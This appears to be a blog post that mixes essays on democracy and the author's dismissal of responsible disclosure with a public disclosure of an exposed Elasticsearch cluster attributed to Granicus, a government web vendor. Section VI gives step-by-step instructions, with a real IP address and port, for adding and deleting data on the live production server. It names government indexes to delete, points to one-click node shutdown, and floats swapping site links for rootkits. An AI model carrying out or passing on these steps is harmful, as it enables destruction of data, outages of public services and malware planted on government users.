I. Democratic Faith

Democracy tests. Another way to think of it is "something that doesn't work in theory but performs quite well in practice".

Certain periods in history will see democracy enact what seems like incredible bouts of incompetence, sleepwalking from crisis to crisis, or going-in-circles behavior. This is less frustrating if it is viewed instead as a complex set of historical and social forces that simply aren't that well understood, yet seem to be indispensable to long term functioning democracies.

Peter Turchin has written some about this, and I will quickly cover some of his theories here. Authoritarian governments are renowned for their swiftness and the demanding pace that their institutions seem to work at. Their ability to the seize the future and build the dreams of tomorrow has always captured the imagination. Fascism has been associated with a sort of elan, innovation, and theatrical flair. Film as propaganda, politicians landing in planes to deliver speeches directly, and the latest fashion all were their domain. Yet behind all of the theatrics are massive projects (authoritarian governments also tend towards gigantism) that standardize way too quickly on unproven technology. That isn't the best, and usually later becomes regarded widely as disastrous in choice. The result is a society that has built the greatest version of a technology the world has moved on from. The USSR was derided as having built "the world's finest 19th century economy" after the scope of their steel plants in Magnitogorsk were revealed in the late 40s.

To harp on this one more time, I have pasted below a quote from FDR from the final weeks of the 1940 campaign. It's on a page torn out of a book I can no longer remember, but the words are hard to forget:

"The surge of events abroad has made some few doubters among us...[yet] all we have known of the glories of democracy, it's freedom, it's efficiency as a mode of living, it's ability to meet the aspirations of the common man--all these are merely an introduction to the greater story of a more glorious future."

Part of this faith that I speak of is in respecting the laws of democracy. Legal paradigms eventually fall apart (about every 40 years seems to be the historical average), and during these moments when the law has clearly failed but not changed, you see acts of civil disobedience. Those would be people gambling that breaking the law today as a protest is of no consequence if it serves to change the law tomorrow or reveal a wider injustice. This is a gamble no doubt, and the civil disobedience acts need to be modest as well.

I think also that if you assume the spirit and heart of most laws in a democracy are good, or at least a decent attempt to be good, following them can be no issue, and civil disobedience is not required. This has become even more true as business leaders, I've noticed, have become very lazy with following the law. As people have become so reticent in challenging them, they no longer invest in teams of lawyers and bulletproof legal structures. They simply don't follow the law. It is sad to see this. When complying with the law is very simple and produces enormous common good for all, noncompliance borders on the tragic and absurd. Sometimes the only thing standing between them and a safer society is a single checkbox that they don't know to click and would probably refuse to do if you told them.

III. The Failure of Self-Regulation

I've talked a little about my views on responsible disclosure. It effectively makes zero difference whether it is or done not, and it is a failed idea that is infused to the core with the ideals of neoliberialism. That being said, except in cases of espionage, I think following some level of responsible disclosure is important. This is only for the sake of respecting the democratic nature of our institutions, and not I would say for protecting people (which is done in another way that is entirely different from responsible disclosure and will be elaborated on in a separate post).

So, with regards to what I elaborated on below, Granicus has already been notified 3 separate times over the last 8 weeks. It might actually be more than that, but that is the floor from the tweets and emails I quickly checked before making this post. This includes directly tweeting at their CMO about the issue in alarming, yet still safely vague, language. A separate article in a major state newspaper (a United States "state" to be clear) will detail these findings in more simple language in two weeks, but will also go into more detail on a few points.

IV. Important Cyber Stuff

  1. Granicus has accidentally left open to the world a group of important database servers that could harm hundreds of millions given the current world crisis.
  2. Most of their customer data can be deleted by downloading a free iOS/Android app and running a couple of commands.
  3. This would impact 1,702 government organizations. Some are local towns, some are state orgs, and others are the CSRC at NIST, House Armed Services Committee, and the USDA.
  4. The cluster has already been maliciously accessed before.

V. But Who Cares, Unless This Data is Super Private?

Good point. So first, a small amount is private, maybe somewhere around 2-3% of millions of records. This is a minor, but not insignificant amount. Closed door meetings, emergency group calls discussing the response to some employee lawsuit, etc. Second, it is not the privacy aspect that is of concern here. The acronym CIA is often used in security...Confidentiality/Integrity/Availability. Obviously by deleting or taking the cluster off line, we certainly impact the availability of a lot of government services. That is important...but still how often does one go to a government website? More important, but not really indistinguishable from all the other breaches one hears about.

So finally we come to integrity. What if it were possible to swap out millions of links on government websites right now with whatever you wanted? Users are clicking on these links everyday. What if instead they downloaded rootkits directly to their computers? What if many of these rootkits landed directly on government computers and in government networks? Could you do this to all 1,700 customers at the same time? Could you do it without Granicus noticing?

VI. The Screenshots:

The below screenshots and instructions give a general overview of the level of access to the main Granicus database cluster.

a). Add Whatever Data You Want to Granicus's Main Production Server ...


1. Download the app HTTPBot if on iOS. All steps are possible with minor adjustments on Android, Linux, Windows, Mac, etc.

2. Open the app, click on "History", and the click the + sign in the bottom right corner. You will arrive at this screen.

3. In the request box change the GET (in blue in the last screenshot) to PUT (orange in this screenshot). Just click on GET and select menu will open up where you can choose PUT.

4. In the request box that now says PUT place http://54.225.102.156:8080/malicioussoftwareupload. Hit send.


5. A success message should follow.

b). Delete Whatever Data You Want from Granicus's Main Production Server



6. Now delete your data by changing the box that previously said PUT to DEL for "delete". You should now know you could actually call DEL on any current "index" (think of them as mini-databases inside of this one really giant database) that Granicus has. Each "index" represents a customer. So a portion of HHS could have been taken offline by appending "hhs.granicus.com" or the US Senate via "senate.grancius.com" to the end of your URL instead of "malicioussoftwaressstuff".

c). Replace Links on Production US Government Websites with Malicious Malware
I'm going to detail how to do this almost exactly with the exception of the final step. See the post immediately following this for step by step instructions. For now a few more screenshots showing the damage you could wreck please see below. Please note I am using the free Chrome Extension Elasticsearch Head.

1. Production nodes that make up the production cluster. Note the dropdown box for Actions>>>Shutdown under the first node. All it takes is a click.



2. These are all of the indexes (mini databases that each represent a government agency) displayed with the Chrome Extension mentioned above. Notice how I can delete them.


3. BinaryEdge, an incredible tool, revealing the full nature of the breach and all production nodes exposed:


4. Granicus, it appears, has been hacked before. There are other clues in their database, but for now I will show this small ransomware note. If you've looked at Elasticsearch clusters that allow write access for long enough  like Granicus does, you've 100% seen things like this. Usually they are just automated internet scanners that seek out open clusters, they can spot them within about 60 minutes now, and immediately they lock down all data until you pay up. Customers, most of the time forget to remove the random notes. You can see that a record of such a note was left here as a "type" specification in the Elasticsearch mapping API.